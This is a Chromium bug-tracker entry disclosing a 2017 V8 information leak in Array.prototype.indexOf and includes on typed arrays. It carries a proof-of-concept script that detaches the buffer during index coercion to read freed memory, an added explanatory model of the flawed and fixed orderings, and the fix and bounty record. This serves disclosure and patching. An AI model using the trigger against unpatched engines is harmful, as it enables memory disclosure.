Security: Information Leak in Array indexOf
Reported by cwhan.t...@gmail.com, Feb 12 2017
Issue description

VULNERABILITY DETAILS
This vulnerability occurs in the following two functions:
- Array.prototype.indexOf(arr, elem, from_index);
- Array.prototype.includes(arr, elem, from_index);
I'll describe only indexOf since the two vulnerabilities occur in a similar process.

Summary: In the process of Array.indexOf, properties of arr can be changed.

In runtime-array.cc,
1. it checks the length of the target array first (https://chromium.googlesource.com/v8/v8/+/5.6.326.50/src/runtime/runtime-array.cc#574).
2. from_index is converted to an integer by calling Object::ToInteger (https://chromium.googlesource.com/v8/v8/+/5.6.326.50/src/runtime/runtime-array.cc#586).
3. Iterate elements using the length calculated in 1.

In step 2, the length of the target array can be changed (or any properties can be changed). If we pass a typed array as `arr`, and if we neuter arr.buffer in step 2, then step 3 searches in freed elements.

VERSION
v8 5.6.326.50 32bit version
I tested it in Ubuntu 14.04.3 64bit, and compiled v8 to ia32.release.

REPRODUCTION CASE
For simplicity, I used the ArrayBufferNeuter native function.

================ test.js ==================
// flags: --allow-natives-syntax
var buf = new ArrayBuffer(0x10000);
var arr2 = new Uint8Array(buf).fill(55);
var tmp = {};
// Runs while indexOf converts from_index (step 2), after the length was read (step 1).
tmp[Symbol.toPrimitive] = function () {
  %ArrayBufferNeuter(arr2.buffer);
  var arr3 = new Uint8Array(0x800).fill(0xfc);
  return 0;
};
print(Array.prototype.indexOf.call(arr2, 0x00, tmp));
==========================================

$ ./out/ia32.release/d8 --allow-natives-syntax ./test_arrindex.js
10

Since we filled the typed array with 55, it has to print -1. But, on my machine, it prints 10 as the output. It searched freed elements, and found the position of a null! If we use Uint8Array for brute-force, we can easily guess values in memory.
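The ordering problem in the report (read the length, coerce from_index, then loop) is a time-of-check/time-of-use bug: the coercion can run arbitrary user code that detaches the buffer, and the loop then trusts the stale length. The following is an added JavaScript model of both orderings, written for this page; it is not the reporter's code and not V8's implementation. It uses `structuredClone(..., { transfer })` to detach the ArrayBuffer in place of the `%ArrayBufferNeuter` native used in the PoC, and the function names (`indexOfStaleLength`, `indexOfRechecked`, `detachingFromIndex`) are this example's own. In JavaScript a detached typed array reads as `undefined`, so the model cannot leak memory; it makes the out-of-bounds reads observable by counting them, which is the same loop that read freed memory in the C++ runtime.

```javascript
'use strict';

// Scan ta[k..len) for elem, counting element reads so that a stale loop
// bound shows up as reads past the array's real (current) length.
function scanFrom(ta, elem, k, len) {
  let reads = 0;
  for (; k < len; k++) {
    reads++;
    if (ta[k] === elem) return { index: k, reads };
  }
  return { index: -1, reads };
}

// ToInteger-like coercion of from_index. Number() invokes Symbol.toPrimitive
// on objects, which is exactly where user code ran in the report.
function coerceFromIndex(fromIndex, len) {
  let k = Math.trunc(Number(fromIndex));
  if (Number.isNaN(k)) k = 0;
  if (k < 0) k = Math.max(len + k, 0);
  return k;
}

// Vulnerable ordering: the length captured in step 1 is used as the loop
// bound in step 3 even though step 2 may have detached the buffer.
function indexOfStaleLength(ta, elem, fromIndex) {
  const len = ta.length;                      // step 1: length read once
  const k = coerceFromIndex(fromIndex, len);  // step 2: user code may run here
  return scanFrom(ta, elem, k, len);          // step 3: trusts the stale len
}

// Fixed ordering: after the coercion, confirm the backing store is still
// intact before touching any element (the check the V8 fix added).
function indexOfRechecked(ta, elem, fromIndex) {
  const len = ta.length;
  const k = coerceFromIndex(fromIndex, len);
  if (ta.buffer.byteLength === 0 || ta.length !== len) {
    return { index: -1, reads: 0 };           // detached or resized: nothing valid to scan
  }
  return scanFrom(ta, elem, k, len);
}

// Constructed from_index whose coercion detaches ta's buffer, the way the
// PoC's Symbol.toPrimitive hook neutered arr2.buffer.
function detachingFromIndex(ta) {
  return {
    [Symbol.toPrimitive]() {
      structuredClone(ta.buffer, { transfer: [ta.buffer] }); // detaches ta.buffer
      return 0;
    },
  };
}

// Usage: compare both orderings on a constructed 64-byte array filled with 55.
function demonstrate() {
  const a = new Uint8Array(64).fill(55);
  const stale = indexOfStaleLength(a, 0, detachingFromIndex(a));
  const b = new Uint8Array(64).fill(55);
  const fixed = indexOfRechecked(b, 0, detachingFromIndex(b));
  return { stale, fixed, lengthAfterDetach: a.length };
}

console.log(demonstrate());
// { stale: { index: -1, reads: 64 }, fixed: { index: -1, reads: 0 }, lengthAfterDetach: 0 }
```

The stale version performs 64 element reads on an array whose length is now 0, which is the out-of-bounds access the report describes; the rechecked version performs none. The general rule the fix illustrates is that any cached length or data pointer taken before a call that can run user code (ToInteger, ToString, a getter, a valueOf hook) must be revalidated after it.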
Feb 13 2017
+yangguo@, could you help triage this issue? Feel free to re-assign the owner.
Feb 13 2017
Seems rather serious at first glance.
Feb 13 2017
Assigning to cbruni@ for investigation: It seems that the IndexOfValueImpl for TypedArrays is missing a neutering check.
Feb 20 2017
[elements] Check if the backing store has been neutered for indexOf

BUG=691323
Change-Id: I84f2c90355982567c421639e115745eadd5fcb21
Reviewed-on: https://chromium-review.googlesource.com/441964
Reviewed-by: Caitlin Potter <caitp@igalia.com>
Reviewed-by: Camillo Bruni <cbruni@chromium.org>
Commit-Queue: Camillo Bruni <cbruni@chromium.org>
Cr-Commit-Position: refs/heads/master@{#43279}
Feb 20 2017
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Feb 21 2017
If possible, please merge your change to the M57 branch 2987 by 5:00 PM PT today, Tuesday (02/21) so we can pick it up for this week's beta release. Thank you.
Feb 24 2017
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Feb 24 2017
Merged to v8 5.7 branch as https://crrev.com/9dae47c8dade7216f624ab4487e610faf90c2237
Feb 28 2017
Congratulations! The panel decided to award $2,000 for this bug!
May 30 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by jialiul@chromium.org, Feb 12 2017